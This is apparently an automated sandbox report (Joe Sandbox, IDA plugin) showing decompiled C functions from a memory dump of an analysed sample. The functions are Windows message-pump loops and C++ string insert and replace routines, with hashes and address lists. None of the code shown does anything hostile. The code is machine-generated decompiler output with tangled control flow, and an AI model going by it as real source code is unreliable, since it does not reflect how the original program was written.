Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC

Uniqueness

Uniqueness Score: -1.00%

Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F070() {
				struct tagMSG _v32;
				long _t7;

				PostThreadMessageW( *0x51325c, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t7 = WaitForSingleObject( *0x513260, 0xa);
				} while (_t7 == 0x102);
				 *0x513260 = 0;
				 *0x51325c = 0;
				return _t7;
			}

0x0041f085
0x0041f0a0
0x0041f0b0
0x0041f0b6
0x0041f0c6
0x0041f0d2
0x0041f0d4
0x0041f0dd
0x0041f0e7
0x0041f0f5

APIs

PostThreadMessageW.USER32 ref: 0041F085
PeekMessageW.USER32 ref: 0041F0AC
DispatchMessageW.USER32 ref: 0041F0B6
PeekMessageW.USER32 ref: 0041F0C4
WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E500() {
				struct tagMSG _v32;
				long _t7;

				PostThreadMessageW( *0x513258, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t7 = WaitForSingleObject( *0x513254, 0xa);
				} while (_t7 == 0x102);
				 *0x513254 = 0;
				 *0x513258 = 0;
				return _t7;
			}

0x0041e515
0x0041e530
0x0041e540
0x0041e546
0x0041e556
0x0041e562
0x0041e564
0x0041e56d
0x0041e577
0x0041e585

APIs

PostThreadMessageW.USER32 ref: 0041E515
PeekMessageW.USER32 ref: 0041E53C
DispatchMessageW.USER32 ref: 0041E546
PeekMessageW.USER32 ref: 0041E554
WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FA40(long* __ecx) {
				struct tagMSG _v32;
				long _t9;
				struct HWND__** _t14;

				_t14 = __ecx;
				PostThreadMessageW( *__ecx, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t9 = WaitForSingleObject(_t14[1], 0xa);
				} while (_t9 == 0x102);
				_t14[1] = 0;
				 *_t14 = 0;
				return _t9;
			}

0x0041fa4b
0x0041fa53
0x0041fa65
0x0041fa75
0x0041fa7b
0x0041fa8b
0x0041fa94
0x0041fa9a
0x0041faa3
0x0041faaa
0x0041fab4

APIs

PostThreadMessageW.USER32 ref: 0041FA53
PeekMessageW.USER32 ref: 0041FA71
DispatchMessageW.USER32 ref: 0041FA7B
PeekMessageW.USER32 ref: 0041FA89
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FDF0(long* __ecx) {
				struct tagMSG _v32;
				long _t9;
				struct HWND__** _t14;

				_t14 = __ecx;
				PostThreadMessageW( *__ecx, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t9 = WaitForSingleObject(_t14[1], 0xa);
				} while (_t9 == 0x102);
				_t14[1] = 0;
				 *_t14 = 0;
				return _t9;
			}

0x0041fdfb
0x0041fe03
0x0041fe15
0x0041fe25
0x0041fe2b
0x0041fe3b
0x0041fe44
0x0041fe4a
0x0041fe53
0x0041fe5a
0x0041fe64

APIs

PostThreadMessageW.USER32 ref: 0041FE03
PeekMessageW.USER32 ref: 0041FE21
DispatchMessageW.USER32 ref: 0041FE2B
PeekMessageW.USER32 ref: 0041FE39
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00417BA0(signed int __ebx, signed int __ecx, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t101;
				signed int _t104;
				signed int _t107;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t116;
				intOrPtr _t122;
				intOrPtr _t128;
				intOrPtr* _t136;
				signed int _t137;
				intOrPtr* _t139;
				signed int _t146;
				intOrPtr _t154;
				signed int _t155;
				intOrPtr _t162;
				signed int _t171;
				signed int _t174;
				signed int _t176;
				signed int _t177;
				signed int _t180;
				intOrPtr* _t186;
				signed int _t187;
				signed int _t191;
				intOrPtr _t196;
				signed int _t199;
				signed int _t200;
				intOrPtr _t204;
				signed int _t206;
				intOrPtr* _t207;
				void* _t209;
				signed int _t210;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t215;
				void* _t217;
				signed int _t218;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				intOrPtr _t223;
				void* _t224;
				signed int _t233;
				signed int _t238;
				intOrPtr* _t239;
				signed int _t241;
				void* _t250;
				void* _t252;
				void* _t253;

				_t176 = __ebx;
				_push(__ecx);
				_t206 = _a12;
				_t238 = __ecx;
				_push(_t221);
				if(_t206 == 0) {
					L13:
					_t186 =  *((intOrPtr*)(_t238 + 0x10));
					_t101 = _a4;
					__eflags = _t186 - _t101;
					if(__eflags < 0) {
						_push("invalid string position");
						E0044F26C(__eflags);
						goto L46;
					} else {
						_t233 = _a8;
						_t217 = _t186 - _t101;
						__eflags = _t217 - _t233;
						_push(_t176);
						_t176 = _a16;
						_t221 =  <  ? _t217 : _t233;
						_t186 = _t186 - _t221;
						__eflags = (_t101 | 0xffffffff) - _t176 - _t186;
						if(__eflags <= 0) {
							L46:
							_push("string too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t250 = _t252;
							_t253 = _t252 - 8;
							_push(_t238);
							_push(_t221);
							_t222 = _v12;
							_t239 = _t186;
							__eflags = _t222;
							if(_t222 == 0) {
								L60:
								_t104 =  *(_t239 + 0x10);
								_t187 = _v0;
								__eflags = _t104 - _t187;
								if(__eflags < 0) {
									_push("invalid string position");
									E0044F26C(__eflags);
									goto L91;
								} else {
									_t209 = _t104 - _t187;
									_t187 = _a12;
									_push(_t176);
									_t180 = _a4;
									__eflags = _t209 - _t180;
									_t176 =  <  ? _t209 : _t180;
									_t113 = _t104 - _t176;
									_a4 = _t113;
									__eflags = (_t113 | 0xffffffff) - _t187 - _a4;
									if(__eflags <= 0) {
										L91:
										_push("string too long");
										E0044F23E(__eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t250);
										_push(_t176);
										_push(_t239);
										_push(_t222);
										_t223 = _v44;
										__eflags =  *((intOrPtr*)(_t187 + 0x10)) - _t223;
										_t224 =  <  ?  *((void*)(_t187 + 0x10)) : _t223;
										__eflags =  *((intOrPtr*)(_t187 + 0x14)) - 8;
										if( *((intOrPtr*)(_t187 + 0x14)) >= 8) {
											_t187 =  *_t187;
										}
										_t177 = _a8;
										__eflags = _t224 - _t177;
										_t241 =  <  ? _t224 : _t177;
										__eflags = _t241;
										if(_t241 == 0) {
											L98:
											_t107 = 0;
											__eflags = 0;
										} else {
											_t207 = _a4;
											while(1) {
												__eflags =  *_t187 -  *_t207;
												if( *_t187 !=  *_t207) {
													break;
												}
												_t187 = _t187 + 2;
												_t207 = _t207 + 2;
												_t241 = _t241 - 1;
												__eflags = _t241;
												if(_t241 != 0) {
													continue;
												} else {
													goto L98;
												}
												goto L99;
											}
											_t111 =  *_t187 & 0x0000ffff;
											__eflags = _t111 -  *_t207;
											asm("sbb eax, eax");
											_t107 = (_t111 & 0xfffffffe) + 1;
										}
										L99:
										__eflags = _t107;
										if(_t107 != 0) {
											L104:
											return _t107;
										} else {
											__eflags = _t224 - _t177;
											if(_t224 >= _t177) {
												__eflags = _t224 - _t177;
												_t100 = _t224 != _t177;
												__eflags = _t100;
												_t107 = 0 | _t100;
												goto L104;
											} else {
												_t109 = _t107 | 0xffffffff;
												__eflags = _t109;
												return _t109;
											}
										}
									} else {
										_t210 = _t209 - _t176;
										_v16 = _t210;
										__eflags = _t187 - _t176;
										if(_t187 < _t176) {
											_t128 =  *((intOrPtr*)(_t239 + 0x14));
											__eflags = _t128 - 8;
											if(_t128 < 8) {
												_a4 = _t239;
											} else {
												_a4 =  *_t239;
												_t222 = _a8;
											}
											__eflags = _t128 - 8;
											if(_t128 < 8) {
												_v12 = _t239;
											} else {
												_v12 =  *_t239;
											}
											__eflags = _t210;
											if(_t210 != 0) {
												E004205A0(_v12 + (_v0 + _t187) * 2, _a4 + (_v0 + _t176) * 2, _t210 + _t210);
												_t222 = _a8;
												_t253 = _t253 + 0xc;
												_t187 = _a12;
											}
										}
										__eflags = _t187;
										if(_t187 != 0) {
											L73:
											_a4 = _t187 - _t176 +  *(_t239 + 0x10);
											_t116 = E00415D50(_t176, _t239, _t222, _t239, _t187 - _t176 +  *(_t239 + 0x10), 0);
											__eflags = _t116;
											if(_t116 != 0) {
												_t191 = _a12;
												__eflags = _t176 - _t191;
												if(_t176 >= _t191) {
													_t182 = _v0;
												} else {
													_t122 =  *((intOrPtr*)(_t239 + 0x14));
													__eflags = _t122 - 8;
													if(_t122 < 8) {
														_t212 = _t239;
													} else {
														_t212 =  *_t239;
													}
													__eflags = _t122 - 8;
													if(_t122 < 8) {
														_a8 = _t239;
													} else {
														_a8 =  *_t239;
													}
													_t182 = _v0;
													E0040B600(_a8 + (_v0 + _t191) * 2, _t212 + (_v0 + _t176) * 2, _v16);
													_t191 = _a12;
													_t253 = _t253 + 4;
												}
												__eflags =  *((intOrPtr*)(_t239 + 0x14)) - 8;
												if( *((intOrPtr*)(_t239 + 0x14)) < 8) {
													_t211 = _t239;
												} else {
													_t211 =  *_t239;
												}
												__eflags = _t191;
												if(_t191 != 0) {
													E0042D8D0(_t211 + _t182 * 2, _t222, _t191 + _t191);
												}
												E00414DF0(_t239, _a4);
											}
										} else {
											__eflags = _t176;
											if(_t176 != 0) {
												goto L73;
											}
										}
										return _t239;
									}
								}
							} else {
								_t196 =  *((intOrPtr*)(_t239 + 0x14));
								__eflags = _t196 - 8;
								if(_t196 < 8) {
									_t136 = _t239;
								} else {
									_t136 =  *_t239;
								}
								__eflags = _t222 - _t136;
								if(_t222 < _t136) {
									goto L60;
								} else {
									__eflags = _t196 - 8;
									if(_t196 < 8) {
										_t215 = _t239;
									} else {
										_t215 =  *_t239;
									}
									_t137 =  *(_t239 + 0x10);
									__eflags = _t215 + _t137 * 2 - _t222;
									if(_t215 + _t137 * 2 <= _t222) {
										goto L60;
									} else {
										__eflags = _t196 - 8;
										if(_t196 < 8) {
											_t139 = _t239;
										} else {
											_t139 =  *_t239;
										}
										__eflags = _t222 - _t139;
										return E00414920(_t176, _t239, _t222 - _t139 >> 1, _t239, _v0, _a4, _t239, _t222 - _t139 >> 1, _a12);
									}
								}
							}
						} else {
							_t218 = _t217 - _t221;
							_v8 = _t218;
							__eflags = _t176 - _t221;
							if(_t176 < _t221) {
								_t162 =  *((intOrPtr*)(_t238 + 0x14));
								__eflags = _t162 - 0x10;
								if(_t162 < 0x10) {
									_a8 = _t238;
								} else {
									_a8 =  *_t238;
								}
								__eflags = _t162 - 0x10;
								if(_t162 < 0x10) {
									_a16 = _t238;
								} else {
									_a16 =  *_t238;
								}
								__eflags = _t218;
								if(_t218 != 0) {
									__eflags = _a16 + _a4 + _t176;
									E004205A0(_a16 + _a4 + _t176, _a8 + _a4 + _t221, _t218);
									_t252 = _t252 + 0xc;
								}
							}
							__eflags = _t176;
							if(_t176 != 0) {
								L26:
								_push(0);
								_a16 = _t176 - _t221 +  *((intOrPtr*)(_t238 + 0x10));
								_t146 = E00415810(_t176, _t238, _t221, _t176 - _t221 +  *((intOrPtr*)(_t238 + 0x10)));
								__eflags = _t146;
								if(_t146 == 0) {
									goto L44;
								} else {
									__eflags = _t221 - _t176;
									if(_t221 < _t176) {
										_t154 =  *((intOrPtr*)(_t238 + 0x14));
										__eflags = _t154 - 0x10;
										if(_t154 < 0x10) {
											_a8 = _t238;
										} else {
											_a8 =  *_t238;
										}
										__eflags = _t154 - 0x10;
										if(_t154 < 0x10) {
											_t219 = _t238;
										} else {
											_t219 =  *_t238;
										}
										_t155 = _v8;
										__eflags = _t155;
										if(_t155 != 0) {
											__eflags = _t219 + _a4 + _t176;
											E004205A0(_t219 + _a4 + _t176, _a8 + _a4 + _t221, _t155);
											_t252 = _t252 + 0xc;
										}
									}
									__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
										_t199 = _t238;
									} else {
										_t199 =  *_t238;
									}
									__eflags = _t176;
									if(_t176 != 0) {
										__eflags = _a4 + _t199;
										E0042D8D0(_a4 + _t199, _a12, _t176);
									}
									__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
									_t200 = _a16;
									 *((intOrPtr*)(_t238 + 0x10)) = _t200;
									if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
										 *((char*)(_t238 + _t200)) = 0;
										goto L44;
									} else {
										 *((char*)( *_t238 + _t200)) = 0;
										return _t238;
									}
								}
							} else {
								__eflags = _t221;
								if(_t221 == 0) {
									L44:
									return _t238;
								} else {
									goto L26;
								}
							}
						}
					}
				} else {
					_t204 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t204 < 0x10) {
						_t171 = __ecx;
					} else {
						_t171 =  *((intOrPtr*)(__ecx));
					}
					if(_t206 < _t171) {
						goto L13;
					} else {
						if(_t204 < 0x10) {
							_t221 = _t238;
						} else {
							_t221 =  *_t238;
						}
						if( *((intOrPtr*)(_t238 + 0x10)) + _t221 <= _t206) {
							goto L13;
						} else {
							if(_t204 < 0x10) {
								_t174 = _t238;
							} else {
								_t174 =  *_t238;
							}
							return E00418000(_t176, _t238, _t221, _t238, _a4, _a8, _t238, _t206 - _t174, _a16);
						}
					}
				}
			}

0x00417ba0
0x00417ba3
0x00417ba4
0x00417ba8
0x00417baa
0x00417bad
0x00417bfc
0x00417bfc
0x00417bff
0x00417c02
0x00417c04
0x00417d2c
0x00417d31
0x00000000
0x00417c0a
0x00417c0a
0x00417c0f
0x00417c11
0x00417c13
0x00417c14
0x00417c17
0x00417c1d
0x00417c21
0x00417c23
0x00417d36
0x00417d36
0x00417d3b
0x00417d40
0x00417d41
0x00417d42
0x00417d43
0x00417d44
0x00417d45
0x00417d46
0x00417d47
0x00417d48
0x00417d49
0x00417d4a
0x00417d4b
0x00417d4c
0x00417d4d
0x00417d4e
0x00417d4f
0x00417d51
0x00417d53
0x00417d56
0x00417d57
0x00417d58
0x00417d5b
0x00417d5d
0x00417d5f
0x00417db1
0x00417db1
0x00417db4
0x00417db7
0x00417db9
0x00417edf
0x00417ee4
0x00000000
0x00417dbf
0x00417dc1
0x00417dc3
0x00417dc6
0x00417dc7
0x00417dca
0x00417dcc
0x00417dcf
0x00417dd1
0x00417dd9
0x00417ddc
0x00417ee9
0x00417ee9
0x00417eee
0x00417ef3
0x00417ef4
0x00417ef5
0x00417ef6
0x00417ef7
0x00417ef8
0x00417ef9
0x00417efa
0x00417efb
0x00417efc
0x00417efd
0x00417efe
0x00417eff
0x00417f00
0x00417f03
0x00417f04
0x00417f05
0x00417f06
0x00417f09
0x00417f0c
0x00417f10
0x00417f14
0x00417f16
0x00417f16
0x00417f18
0x00417f1b
0x00417f1f
0x00417f22
0x00417f24
0x00417f41
0x00417f41
0x00417f41
0x00417f26
0x00417f26
0x00417f30
0x00417f33
0x00417f36
0x00000000
0x00000000
0x00417f38
0x00417f3b
0x00417f3e
0x00417f3e
0x00417f3f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f3f
0x00417f55
0x00417f58
0x00417f5b
0x00417f60
0x00417f60
0x00417f43
0x00417f43
0x00417f45
0x00417f6a
0x00417f6e
0x00417f47
0x00417f47
0x00417f49
0x00417f65
0x00417f67
0x00417f67
0x00417f67
0x00000000
0x00417f4b
0x00417f4d
0x00417f4d
0x00417f52
0x00417f52
0x00417f49
0x00417de2
0x00417de2
0x00417de4
0x00417de7
0x00417de9
0x00417deb
0x00417dee
0x00417df1
0x00417dfd
0x00417df3
0x00417df5
0x00417df8
0x00417df8
0x00417e00
0x00417e03
0x00417e0c
0x00417e05
0x00417e07
0x00417e07
0x00417e0f
0x00417e11
0x00417e2e
0x00417e33
0x00417e36
0x00417e39
0x00417e39
0x00417e11
0x00417e3c
0x00417e3e
0x00417e48
0x00417e4f
0x00417e55
0x00417e5a
0x00417e5c
0x00417e5e
0x00417e61
0x00417e63
0x00417ea6
0x00417e65
0x00417e65
0x00417e68
0x00417e6b
0x00417e71
0x00417e6d
0x00417e6d
0x00417e6d
0x00417e73
0x00417e76
0x00417e7f
0x00417e78
0x00417e7a
0x00417e7a
0x00417e8a
0x00417e99
0x00417e9e
0x00417ea1
0x00417ea1
0x00417ea9
0x00417ead
0x00417eb3
0x00417eaf
0x00417eaf
0x00417eaf
0x00417eb5
0x00417eb7
0x00417ec2
0x00417ec7
0x00417ecf
0x00417ecf
0x00417e40
0x00417e40
0x00417e42
0x00000000
0x00000000
0x00417e42
0x00417edc
0x00417edc
0x00417ddc
0x00417d61
0x00417d61
0x00417d64
0x00417d67
0x00417d6d
0x00417d69
0x00417d69
0x00417d69
0x00417d6f
0x00417d71
0x00000000
0x00417d73
0x00417d73
0x00417d76
0x00417d7c
0x00417d78
0x00417d78
0x00417d78
0x00417d7e
0x00417d84
0x00417d86
0x00000000
0x00417d88
0x00417d88
0x00417d8b
0x00417d91
0x00417d8d
0x00417d8d
0x00417d8d
0x00417d96
0x00417dae
0x00417dae
0x00417d86
0x00417d71
0x00417c29
0x00417c29
0x00417c2b
0x00417c2e
0x00417c30
0x00417c32
0x00417c35
0x00417c38
0x00417c41
0x00417c3a
0x00417c3c
0x00417c3c
0x00417c44
0x00417c47
0x00417c50
0x00417c49
0x00417c4b
0x00417c4b
0x00417c53
0x00417c55
0x00417c67
0x00417c6a
0x00417c6f
0x00417c6f
0x00417c55
0x00417c72
0x00417c74
0x00417c7e
0x00417c87
0x00417c8a
0x00417c8d
0x00417c92
0x00417c94
0x00000000
0x00417c9a
0x00417c9a
0x00417c9c
0x00417c9e
0x00417ca1
0x00417ca4
0x00417cad
0x00417ca6
0x00417ca8
0x00417ca8
0x00417cb0
0x00417cb3
0x00417cb9
0x00417cb5
0x00417cb5
0x00417cb5
0x00417cbb
0x00417cbe
0x00417cc0
0x00417cd1
0x00417cd4
0x00417cd9
0x00417cd9
0x00417cc0
0x00417cdc
0x00417ce0
0x00417ce6
0x00417ce2
0x00417ce2
0x00417ce2
0x00417ce8
0x00417cea
0x00417cf3
0x00417cf6
0x00417cfb
0x00417cfe
0x00417d02
0x00417d05
0x00417d08
0x00417d1d
0x00000000
0x00417d0a
0x00417d0e
0x00417d18
0x00417d18
0x00417d08
0x00417c76
0x00417c76
0x00417c78
0x00417d21
0x00417d29
0x00000000
0x00000000
0x00000000
0x00417c78
0x00417c74
0x00417c23
0x00417baf
0x00417baf
0x00417bb5
0x00417bbb
0x00417bb7
0x00417bb7
0x00417bb7
0x00417bbf
0x00000000
0x00417bc1
0x00417bc4
0x00417bca
0x00417bc6
0x00417bc6
0x00417bc6
0x00417bd3
0x00000000
0x00417bd5
0x00417bd8
0x00417bde
0x00417bda
0x00417bda
0x00417bda
0x00417bf9
0x00417bf9
0x00417bd3
0x00417bbf

APIs

_memmove.LIBCMT ref: 00417C6A
_memmove.LIBCMT ref: 00417CD4

Strings

string too long, xrefs: 00417D36
invalid string position, xrefs: 00417D2C

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9

Uniqueness

Uniqueness Score: -1.00%

Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00414160(signed int __eax, void* __ebx, intOrPtr* __ecx, signed int __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr* _v20;
				void* __ebp;
				intOrPtr* _t24;
				intOrPtr _t31;
				intOrPtr* _t34;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t48;
				intOrPtr* _t51;
				intOrPtr _t53;
				intOrPtr* _t56;
				intOrPtr* _t57;
				signed int _t59;
				void* _t60;
				intOrPtr* _t63;
				void* _t67;

				_push(__ecx);
				_push(__ebx);
				_t63 = __ecx;
				_push(__edi);
				_t59 = __edi | 0xffffffff;
				_t51 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t51 < _a4) {
					L32:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					__eflags =  *((intOrPtr*)(_t51 + 0x14)) - 0x10;
					_t24 = _v20;
					if( *((intOrPtr*)(_t51 + 0x14)) >= 0x10) {
						_t51 =  *_t51;
					}
					 *_t24 = _t51;
					return _t24;
				} else {
					_t48 = _a8;
					_t5 = _t48 + 0x10; // 0xcccccccc
					_t60 =  <  ?  *_t5 : _t59;
					if((__eax | 0xffffffff) - _t51 <= _t60) {
						_push("string too long");
						E0044F23E(__eflags);
						goto L32;
					} else {
						if(_t60 != 0) {
							_push(0);
							_v8 = _t51 + _t60;
							if(E00415810(_t48, __ecx, _t60, _t51 + _t60) != 0) {
								_t31 =  *((intOrPtr*)(__ecx + 0x14));
								if(_t31 < 0x10) {
									_a8 = __ecx;
								} else {
									_a8 =  *__ecx;
								}
								if(_t31 < 0x10) {
									_t56 = _t63;
								} else {
									_t56 =  *_t63;
								}
								_t53 = _a4;
								_t33 =  *((intOrPtr*)(_t63 + 0x10)) != _t53;
								if( *((intOrPtr*)(_t63 + 0x10)) != _t53) {
									E004205A0(_t56 + _t53 + _t60, _a8 + _t53, _t33);
									_t53 = _a4;
									_t67 = _t67 + 0xc;
								}
								if(_t63 != _t48) {
									__eflags =  *((intOrPtr*)(_t48 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t48 + 0x14)) >= 0x10) {
										_t48 =  *_t48;
									}
									__eflags =  *((intOrPtr*)(_t63 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t63 + 0x14)) < 0x10) {
										_t34 = _t63;
									} else {
										_t34 =  *_t63;
									}
									__eflags = _t60;
									if(_t60 != 0) {
										__eflags = _t34 + _t53;
										E0042D8D0(_t34 + _t53, _t48, _t60);
										goto L28;
									}
								} else {
									_t38 =  *((intOrPtr*)(_t63 + 0x14));
									if(_t38 < 0x10) {
										_t57 = _t63;
									} else {
										_t57 =  *_t63;
									}
									if(_t38 < 0x10) {
										_t39 = _t63;
									} else {
										_t39 =  *_t63;
									}
									if(_t60 != 0) {
										E004205A0(_t39 + _t53, _t57, _t60);
										L28:
									}
								}
								E00414460(_t63, _v8);
							}
						}
						return _t63;
					}
				}
			}

0x00414163
0x00414164
0x00414166
0x00414168
0x00414169
0x0041416c
0x00414172
0x00414260
0x00414260
0x00414265
0x0041426a
0x0041426b
0x0041426c
0x0041426d
